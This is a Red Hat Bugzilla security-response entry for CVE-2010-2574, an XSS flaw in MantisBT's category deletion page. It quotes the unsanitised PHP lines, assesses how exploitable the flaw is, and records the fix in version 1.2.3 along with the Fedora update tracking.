Bug 633003 (CVE-2010-2574)
Summary: | CVE-2010-2574 Mantis: XSS in Add Category action. | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | low | Docs Contact: | |
Priority: | low | ||
Version: | unspecified | CC: | d, giallu, sven |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2010-12-17 23:46:31 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 634341 | ||
Bug Blocks: |
Description
Jan Lieskovsky
2010-09-12 12:30:17 UTC
The relevant code part in Mantis package, as shipped with Fedora release of 12 and 13 is slightly different: BUILD/mantisbt-1.1.8/manage_proj_cat_delete.php: 32 auth_reauthenticate(); 33 34 $f_project_id = gpc_get_int( 'project_id' ); 35 $f_category = gpc_get_string( 'category' ); i.e. instead of $f_category_id from [5], there is $f_category in corresponding Fedora releases. The subsequent code in Fedora is as follows: 39 # Confirm with the user 40 helper_ensure_confirmed( lang_get( 'category_delete_sure_msg' ) . 41 '<br/>' . lang_get( 'category' ) . ': ' . $f_category, 42 lang_get( 'delete_category_button' ) ); 43 44 category_remove( $f_project_id, $f_category ); On line 41 $f_category isn't sanitized either => discussion: =========== 1, if you think it should, as it may be exploitable, please schedule Fedora mantis updates, 2, if you think it is not necessary (it is not exploitable), please provide arguments, why do you think so. Thanks, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team MantisBT 1.2.3 has been released to fix this XSS vulnerabilitiy. This vulnerability isn't too severe because it requires the malicious user to have project manager permissions (this is typically a position of high trust within a MantisBT environment) to create a maliciously named category. Then a successful attack would require another (target) project manager/administrator to attempt to delete the maliciously named category. However saying that, it is still important to fix even though exploitation would be difficult with MantisBT's use of HttpOnly cookie flags, CSRF tokens and other security features. Version 1.2.3 release information: http://sourceforge.net/mailarchive/message.php?msg_name=4C8FC573.3060900%40leetcode.net http://sourceforge.net/projects/mantisbt/files/ Created mantis tracking bugs for this issue Affects: fedora-all [bug 634341] This is now fixed in all branches |